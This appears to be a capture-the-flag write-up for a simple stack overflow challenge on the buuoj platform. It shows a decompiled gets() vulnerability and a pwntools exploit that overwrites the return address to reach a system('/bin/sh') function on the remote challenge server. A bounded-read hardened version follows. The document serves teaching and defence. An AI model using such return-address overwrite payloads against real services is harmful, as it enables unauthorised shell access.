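0x01 Finding the vulnerability

A very simple stack overflow: gets() writes into s with no length limit.

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+1h] [rbp-Fh]

  puts("please input");
  gets(&s, argv);
  puts(&s);
  puts("ok,bye!!!");
  return 0;
}

int fun()
{
  return system("/bin/sh");
}
```

0x02 Analysis

No explanation needed; an identical one appeared earlier.

exp

```python
from pwn import *

p = remote('buuoj.cn', 6001)
fun_addr = 0x0000000000401186
# 0x0f bytes from s (at rbp-0xF) up to the saved rbp, 8 bytes for the saved rbp,
# then the return address
payload = b'a' * 0x0f + b'a' * 8 + p64(fun_addr)
p.sendline(payload)
p.interactive()
```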
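For comparison, a hardened form of the main() above, with the gets() call replaced by a bounded read. This is an added example, not code from the original post or the challenge binary; read_line_bounded, read_constructed, demo_buf, BUF_SIZE and the LINE_* values are illustrative names, and the buffer size is taken from the rbp-0xF offset in the decompilation.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x0f   /* s sits at rbp-0xF: 15 bytes up to the saved rbp */
enum { LINE_EOF = -1, LINE_OK = 0, LINE_TRUNCATED = 1 };

/* Bounded replacement for gets(): stores at most cap-1 bytes plus a NUL.
 * An over-long line is cut and its tail discarded, so nothing is written
 * past buf and the excess does not leak into the next read. */
static int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return LINE_EOF;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';            /* whole line fit: strip newline */
        return LINE_OK;
    }
    int c, status = LINE_OK;
    while ((c = fgetc(in)) != EOF && c != '\n')
        status = LINE_TRUNCATED;        /* drain what did not fit */
    return status;
}

/* Helper for constructed inputs: feeds a string through the reader
 * via a temporary file and leaves the result in demo_buf. */
char demo_buf[BUF_SIZE];
int read_constructed(const char *input)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return LINE_EOF;
    fputs(input, f);
    rewind(f);
    int status = read_line_bounded(f, demo_buf, sizeof demo_buf);
    fclose(f);
    return status;
}

int main(void)
{
    char s[BUF_SIZE] = "";
    puts("please input");
    if (read_line_bounded(stdin, s, sizeof s) == LINE_TRUNCATED)
        fputs("input too long, truncated\n", stderr);
    puts(s);
    puts("ok,bye!!!");
    return 0;
}
```

A line of 0x0f + 8 + 8 filler bytes, the same length as the payload in the exp, is cut to 14 bytes plus the terminator, so the saved rbp and the return address are never reached.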